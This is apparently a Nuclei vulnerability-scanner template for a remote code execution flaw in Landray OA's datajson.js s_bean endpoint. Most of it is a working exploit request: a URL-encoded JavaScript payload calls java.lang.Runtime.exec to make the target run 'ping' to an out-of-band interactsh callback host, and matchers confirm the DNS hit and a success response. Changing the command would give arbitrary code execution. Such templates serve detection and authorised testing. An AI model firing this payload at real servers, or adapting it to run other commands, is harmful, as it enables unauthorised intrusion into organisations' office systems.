36 lines
1.7 KiB
YAML
36 lines
1.7 KiB
YAML
id: landray-oa-datajson-rce
|
|
|
|
info:
|
|
name: Landray OA Datajson S Bean - Remote Code Execution
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
Landray Office Automation (OA) software, specifically in the "s_bean" component's "sysFormulaSimulateByJS" functionality. This vulnerability allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system.
|
|
reference:
|
|
- https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
|
|
- https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml
|
|
classification:
|
|
cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: landray
|
|
product: landray_office_automation
|
|
fofa-query: app="Landray-OA系统"
|
|
tags: landray,rce,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(interactsh_protocol, "dns")'
|
|
- 'contains(body, "success") && contains(body, "true")'
|
|
condition: and
|
|
# digest: 4b0a004830460221008119a38495fa735a64d92e2ee8fb7d5710a8832bc1f33c6c9eeabbe2e6f49b67022100f086acc355a9283a3dc78cba9b769e42aa6c43f571bb8ff624003822c908ff15:922c64590222798bb761d5b6d8e72950 |